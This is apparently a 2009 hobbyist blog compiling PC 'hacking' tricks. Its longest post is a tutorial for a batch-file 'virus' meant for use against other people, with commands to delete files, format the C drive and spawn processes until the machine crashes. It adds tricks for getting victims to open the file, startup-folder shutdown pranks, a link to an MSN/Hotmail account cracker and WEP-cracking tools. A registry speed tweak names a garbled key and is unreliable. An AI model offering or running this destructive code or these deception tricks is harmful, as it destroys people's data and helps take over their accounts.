Saturday, February 28, 2009

How To Scare Your Friends

How To Scare Your Friends


Step 1. Open up notepad
Step 2. Type
lol=msgbox("Whatever you want message to say",20,"Whatever you want the window to be titled")

Ex:
lol=msgbox("Warning your computer has been infected by a virus ",20,"Virus Alert")

Step 3. Save the text as Whateveryouwant.vbs

The number 20 represents the type of window style the message will be in. You can experiment with different styles you want.

How to Make a batch form notpad

How to Make a batch form notpad


How to build a simple .bat virus

Index
1. Tools
2. What makes a virus a virus
3. Making your first batch file
4. Making a batch virus
5. Destructive commands
6. Most common tricks used to make someone open the file
7.By, Robby23, 24 Guns, Harry, SLAUGHTER, blu3m4n, BuRP QuakE





1. Tools
To make a batch program you will need a text program (ex. Word,notepad,wordpad etc…) A keyboard if you don’t have one you can use the ON-screen keyboard
To get to the on-screen keyboard start>all programs>accessories>accessibility


2. What makes a virus a virus
When people think of a virus they think of a computer virus but the word virus came from a virus that’s in your body. They also think a virus is meant to delete or destroy things. They normally do but a virus is called a virus because, it copies itself. Like a virus in your body it copies it self to other cells cause it can’t live with out a host. Same with a computer virus with out a file or a program a virus can’t be made.
So all a computer virus is: a program that copies it self ,but some people put destructive code in it.

3. Making a Batch file
I’m going to use notepad you can use what ever you want

We are also going to make a “Hello World� Application that is the first program you make in any language

When making a batch file you are always going to use this line first

@echo off

You can turn it on if you like. All that does is telling the program not to tell its location. If you turn it on then the program will tell were it is at on the computer.
You can experiment a little if you want.

Now we are going to make it say Hello World

To do this we need a echo command which looks like this
echo

This tells the program to write something since we want it to say Hello World we are going to type Hello World next to echo to make it look like this

echo Hello World

so at this point you should have

@echo off
echo Hello World

now go to file save and name it test.bat ( you can name it whatever you want as long as it has .bat at the end.)
Save it to the desktop so you can get to it faster.

Then run it



You should of have a black box open and close really fast

To fix this we need a pause command and we will also need a goto command

The goto command is the most importent command

If you dont know the goto command tell it were to go to next.

since we need a pause command we want it to go to pause so we need to write goto pause like this

goto pause

now u should have

@echo off
echo Hello World
goto pause

now we need a subsection name pause

you make a sub section by putting a : by the first word like this

:start

or

:end

,but we said go to pause so we need one name pause like this

Stick Out Tongueause

then under that we are goin to write pause

Stick Out Tongueause
pause

this just makes it were it will keep the box open till you press a key

Optionl

At the end you can put a exit at the end of pause were the goto command should go ,but you dont have to.

save at run it now.You should be able to read your text now

4. Making a Batch file into a virus

This is alot easier then some people think.

To make a virus you just need the copy command which looks like this

copy

so lets make a new one by reading section 3 you should know you need the @echo off

@echo off
copy

allright we are going to name this file first

and we are going to make it copy itself to C:\WINDOWS just because no one looks in their

this is what it looks like (i will explain it)

@echo off
copy first C:\WINDOWS

copy-tells it to copy
first-is just the name of the file we want to copy
C:\WINDOWS- is the place you want to copy to

that is a virus

5. Destructive commands

If you get pissed at someone you might want to send him someting to mess with him. Here are some commands to add to the virus.

del -this del files

del file name
del (.txt*)

the (.txt*) would delete all txt files on the computer the * at the end just means all instead of a file called .txt

deltree- this deletes the whole folder

you can remeber it like this

Think of a tree if you type del you are only deleting a part of the tree ,but if you type deltree you are deleting the whole tree

format- this deltes everything

format c:

this delets everything in the c drive

open

this is just fun to use to scare some one but not do damage to something

open name of file

like to open notepad type

open notepad

to open microsoft paint type

open mspaint

just put ta crap load in their

also the next one that can be very usefull is looping

this will make the file repet it self til it is shut off

say your first sub section is called start

you would just make the goto command to go to start like

@echo off
:start
start notepad
goto start

that will open notepad over and over and if they dont close it it can crash their computer

to open the command window you have to use var. like %% (not going to explain var. it would be confusing)

@echo off
:whatever
start %0
goto whatever

this will open the black box over and over

6. Most command tricks

people will put it in a folder with a couple read me doc. and call it a game

people will say check this out it is so cool

people will say check out this hack or cheat i found for this game

to check if the are good do this

tell them to put it in a zip folder and send it

unzip and right click on the program(dont open it)

and press edit

that will show the sorce code and if you see something you dont like then delete it


ok


see u The thing is....

onemyshow

Make Force Computer Keep Restarting

Make Force Computer Keep Restarting


1.open note pad

2.type "shutdown -s" with out quotes

3.save the file with .bat extension


4.explaination,u have created a prog which shutdowns the pc with in 30
of executing the file

5. now open "x:\Documents and Settings\USERNAME\Start Menu\Programs\Startup\" (x->is the drive on which ur windows has been installed and USERNAME is the username)

6.paste a shortcut on this directory



NOW WHEN EVER UR FRIEND STARTS HIS PC a count down will start after 30 sec his pc will shutdown
u can also maki his pc restart instead of shutting down.. just replace "shutdown -s" "restart _s"


enjoy.... this is not a virus but look so...

Live CD for Wireless Hacking, Used by the FBI

Live CD for Wireless Hacking, Used by the FBI


Live CD for Wireless Hacking, Used by the FBI - Shaify Mehta

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.

Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of "strong" encryption while a 128 bit key has 104. The IV is placed in encrypted frame's header, and is transmitted in plain text.

Traditionally, cracking WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packetsâââ??¬ââ?¬�a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.

Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, "It doesn't matter if you use 128 bit WEP keys, you are vulnerable!

---------------------------------------------------------------------------------------------

auditor-200605-02-no-ipw2100.iso


This version is for systems with the Intel B/G wireless cards (IPW2200) only. All other system should take the version below.
The md5sum of auditor-200605-02-no-ipw2100.iso is "70a5f3e47c191c055366b3b0a3fa2c90

Code:
\\auditor-200605-02-ipw2100.iso

This version is for all systems except systems with the Intel B/G wireless cards (IPW2200).
The md5sum of auditor-200605-02-ipw2100.iso is "cdec4b975c1001ddc127a16a32ed1dd7"

Code:

What do beeps mean??? know here.......

What do beeps mean??? know here.......


One Beep :
DRAM refresh failure
This may be due to - Bad memory chips
- A bad DMA Chip
- Bad memory addressing chips on the motherboard

Two Beeps :
Parity error or Parity Circuit failure
-Your memory may not be seated properly on the mother board.
-Unplug and plug it properly

Three Beeps :
Bad memory or bad mother board

Four beeps :
Timer failure in the RAM.

Five Beeps :
CPU chip may be dead

Six Beeps :
Keyboard controller may have failed

Seven beeps :
CPU is dead. Retry the connections and test.
-Replace the whole motherboard.

Eight Beeps :
Video card is missing or Bad.

Nine Beeps :
Damaged ROM BIOS.
-BIOS chip has to be replaced if it persists.

Ten Beeps :
CMOS shutdown.
-Replace CMOS memory and associated chips.

Eleven Beeps :
Cache memory test has failed.
-To enable cache memory try CTRL+ALT+SHIFT++.

One long Beep and Three short Beeps:
Memory failure

One long Beep and Eight short Beeps :
Video card failure.
-Try to install video card in another slot.

No Beeps :
Check Power supply
-Check mother board connections
-Remove all cards except video card and check for system power up
-Insert all cards one at a time and check their operation.
-If system hangs on the installation of a particular card, then it is the cause for the problem and replace it with another of that type and check

Turn Your Pc On in 10 Seconds

Turn Your Pc On in 10 Seconds



Click on the start button then press R it will take u to Run well go to run
n type Regedit
press enter
this will open Registery Editor
now look for the key

HKEY_LOACAL_MECHINESYSTEMCurrentControlSetContr olContentIndex

now there find the Key Called
"Startup Delay"
Double Click On It
Now where its Base
Click Decimal
Now its Default Value Is 4800000
Change The Value To 40000
here u go u have done it
now close the Registery Editor and Restart Your Computer
You'll See The Result

MSN Messenger and Hotmail accounts cracker

MSN Messenger and Hotmail accounts cracker


MSN Messenger and Hotmail accounts crack

MSN Messenger and Hotmail accounts cracker - Shaify Mehta



http://rapidshare.com/files/67541185/MSN_Messenger_Account_Cracker_v2.zip

Wi-fi without router

Wi-fi without router

Here is a short guide to help have the benefits of a wifi router without actually having it on Windows XP.

SHARING YOUR EXISTING ETHERNET INTERNET CONNECTION

1. Go to Control Panel -> Network Connection.
2. Right click on Your Ethernet connection and click on “Properties”.
3. Go to “Advanced” Tab.
4. Check “Allow Other NEtwork….. Internet Connection”
5. In the Drop down Below select the Wifi connection of your pc. If it is disabled, it will be showing your wifi connection already.
6. Click on “Settings”
7. Check the protocols you need to share. Jamal has explained on them.I normally use only http and https.
8. Click on “Ok”.you reach the network connection page. The sharing part is now over.

FINDING DNS SERVER IP ADDRESS.

1. Click on Start -> Run
2. Type in cmd in the Run prompt
3. In the new window type “ipconfig /all” and press enter.
4. Note down your DNS server ip address from the screen.

CONFIGURING THE WIFI

1. Go again to Control Panel -> network connections.
2. Right click on your WIFI connection and click “properties”.
3. Go to”Wireless Network” Tab.
4. The “use windows to configure my wireless network connection” should be checked.
5. In the preferred network connection section click on add button
6. Enter a name of your wish to the network name.
7. Network authentication is “open”
8. Change Data Encryption to “Disabled”
9. Check the “this is a computer to computer …. not used” connection.
10. Click “Ok”.
11. Click on general tab. select “internet protocol(tcp/ip) and click on properties button.
12. Now type 192.168.0.1 in ip address, 255.255.255.0 in subnet mask, leave default gateway empty.
13. Fill in the DNS server entry which you had noted down earlier.
14. Click on “OK” and your network is set.

Your network should appear on the wifi network list now. Search for wlan on your phone. Connect and enjoy browsing on your phone

Wednesday, February 4, 2009

Chat With Command Prompt

Chat With Command Prompt

If you want a private chat with a friend or client on you Network, you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:

eg:
step 1:

http://sai143mohan.googlepages.com/msg1.bmp

step 2:

http://sai143mohan.googlepages.com/msg2.bmp

step 3:

http://sai143mohan.googlepages.com/msg3.bmp
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:

MESSENGER
User: 56.108.104.107
Message: Hi

Now all you need to do is press "Enter", and start chatting!

go to top of this page

Monday, February 2, 2009

Nokia phone's security Master Code It is safe and completely FREE!

Nokia phone's security Master Code
It is safe and completely FREE!




just email me
email:sai143mohan@yahoo.co.in
subject should be IMEI no _______________
  • 15 digits IMEI
  • company name of mobile
  • u r email address